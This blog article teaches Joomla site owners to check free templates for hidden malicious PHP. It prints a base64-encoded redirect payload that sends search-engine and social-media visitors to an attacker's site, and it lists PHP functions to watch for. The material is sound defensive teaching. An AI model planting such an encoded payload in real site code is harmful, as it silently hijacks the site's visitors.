Scrutinize Free Joomla Templates Carefully

This article teaches novices how to check a Joomla template for malicious PHP code before installing it. Written back when I was focused on Joomla, this advice applies to any system similar to the Joomla's templates, which enables adding executable, server-side code much too mindlessly.

Pro bono design, or Trojan horse? Joomla templates are PHP code, so be careful.Free Joomla templates can hack your site.

Some hacks target vulnerable technology. Other hacks target vulnerable behavior. This article deals with the latter. The less often we do those things which might result in our sites being hacked, the safer we'll be. In the case of free Joomla templates made by evildoers, the behavior in question is this: let's stop doing the hackers' jobs for them.

I'm about to teach you how to do security checks on Joomla templates. If you follow the steps in this article before installing new templates to Joomla, you'll have an advantage against people who hack sites passively through malicious freebies - a.k.a., that classic intrusion method, the Trojan horse. Let me show you something.

This is a base64-encoded version of my site's (old) favicon:

AAABAAEAEBAAAAEACABoBQAAFgAAACgAAAAQAAAAIAAAAAEACAAAAAAAAAEAAAAAAAAAAAAAAAEAAAAAAAAfZZIAPqeDAB89NAAzn9kALB5LACogSQA5U3AAGhIoAEFTUAAnd7wAGyI6AGGq4wA1SVgAIGOQACcpTQBCST0AMhhOAC4+WwBsmdAAJyE5ABgkSAAzImAAaa6bACd3uQAcIDgALC9PAGOq4gA5m9kAWXKiAE+SvQAjH0YAKhpDAE+l2AAoITcAVnqwAD9CUgAgX4oATYvWAGKKuQBIj9EAKB9IABlYjQA9OUYAKxpBAEEtSgBHRWEAKENFADUiXAA0QGwAPVxyACZJaABDQ0kAKEhgADRBTgBLS2IANSA0AGSeyQA9Ul4AHh5FAB5tuwAlJkkAJB9SACZspQAdESYAOlNiADAWQAAXEyAAIzBsABocPgAtVJgAQKh9AC8LIQAoT4kAIw4fACgfPwAkHEUAGll7AECPwAAeHj8ARoa8ACgXKwAiEi8ANl9sAFmg3QAjCyYAG0ReABt2zQAgS34AIk52ACpGVgAnFlYAOZjRAEuq4ABBXo8AFg8qACg3XgAkHj8AKlZnAC4dKwAkXaQALIzYAC0XKgAwWYgAMEpZAC5otQBWrpsAIGy7AEB9ugAnUlAAJiJSAF2FwAA5V2kANzxMAFmi1wA9R20AOE1oADdJZwAqgtMALRhWAC1GUwA0jasAI1iCAEOG1QBXndwAIB5JAERHXQBEYHgAJRVEAC9XXABVfqsARGeTACsZWwBrt7EASKG5AEhseQBMjMcAT4TKADBUZAApX6AAMF+TADZNYABdkcsALyRSAEGf1wBDfL4ATZPPAF6f3QAoHEsAJzxbACNVcgA1UVwAKFSSACsQJgBQj88AR3C/AB4XIwA6WGgAGSNXACMOHgA8U2AAKh42AHKo4QAzXZAAN01bACmIVAA0ZnMALCxJAFCppAAiT5MAVqjZACw3ZAAulWAAFBUqABkmSgAvY50AcqzeADVvewAjMVsAPGKxADthbQBYq+IAO1VtAE2q4QAhESAAIhVaAEVHYwBcndIAHyFDADefdwBPl9kARaaMACqK1QAuUFYALGiyABhWoQAdJVIAIRUdADeaywBMrJAAKWxOAChYrgAkFUUAL425AP/ZwwA4GUIAKpJdADp2ywAsXMAAW6jSAF+U1gA1T14AQkBhACxUXwA2LEQAJEl1AEZ8wAAgGDEAOWOYAC0xagA0LGcAcqzjADNNbQA9LkgAFx5NABdoqAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyza5OZy1bw8z03AIo4Ziy8uflndhidR+gZpzLqWzm8vLQAxnNMAGHCJujFmwgD/Lyy19IzUqcl3XEjFS0jdHy8septUs3nSiso04sVFlxMvLWkt/BRlml88luh08UELLy7hKoE5frkhFiJmHgphJy8uDuwpEqsHIY5LO0SbYnsvLFT18ydYJesJ7vVOhMFTLy0OtOt9XKYqoJ2hrqYsHy8vawxSdWEx5PpGQT9DZrMvL220oEDIAF1sgGtyv3V7Lyy8EQWCUDWq/j7QLcRG3y8uOdpMrDiQ7dRu2XE1sAsvLzB8hGBNV4FZkA8WVx6TLy7xGAb7Gaad4yoWEFqvNywAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=

If you threw that (prefixed with "data:image/x-icon;base64," including the comma) into the src attribute of an HTML img tag, you'd see my tiny head.

Now, here's something else entirely:

JGJhaWw9aGVhZGVyc19zZW50KCk7IGlmICghJGJhaWwpeyAkcmVmZXJlcj0kX1NFUlZFUlsiSFRUUF9SRUZFUkVSIl07ICR1YWc9JF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdOyBpZiAoJHVhZykgeyBpZiAoIXN0cmlzdHIoJHVhZywiTVNJRSA3LjAiKSBhbmQgIXN0cmlzdHIoJHVhZywiTVNJRSA2LjAiKSl7IGlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmxcP3NhLyIsJHJlZmVyZXIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7IGlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7IGhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9uZWZhcmlvdXNldmlsZG9lcndpdGhhd2Vic2l0ZXNvbWVob3cuY29tIik7IGV4aXQoKTsgfSB9IH0gfSB9

If you threw the above into a PHP base64_decode() function, and put the output of that into a PHP eval() function, then all human visitors your site would be redirected to some nefarious evildoer's website. Search engines wouldn't notice a change. Your site would be hacked.

That's nothing. If they can run code on your site, they may as well install a root kit, for total control. 

Why the hacking lesson? The reason is simple: your Joomla template is PHP code, and as such, it's a perfect vector for hackers. Someone's always searching for a free Joomla template, so if some jerk with both design skill, and coding skill, makes a short-term effort to heavily market a good-looking template with evil code inside, it's just a matter of time before he gets his hooks into someone's site.

The reason he'll be successful is because people don't scrutinize template code before they install it. Here's how to look for suspicious code in a Joomla template:

  1. Download the template; it can't hurt anything unless it's installed in Joomla.
  2. Open the template's installable zip file from your Downloads folder.
  3. Browse through it folder by folder, looking for files ending in .php, and open each one.
  4. Look for blocks of encoded content, like the examples above.
  5. Look for uses of the PHP features listed below; if any of them appear, question why.

The following PHP features frequently appear in malicious code. While each has legitimate uses, they aren't relevant to templates, and could be signs of a hack: base64_decode, eval, curl_setopt, curl_setopt_array, curl_init, curl_exec, fopen, display_errors, error_reporting, ini_set, and ini_get.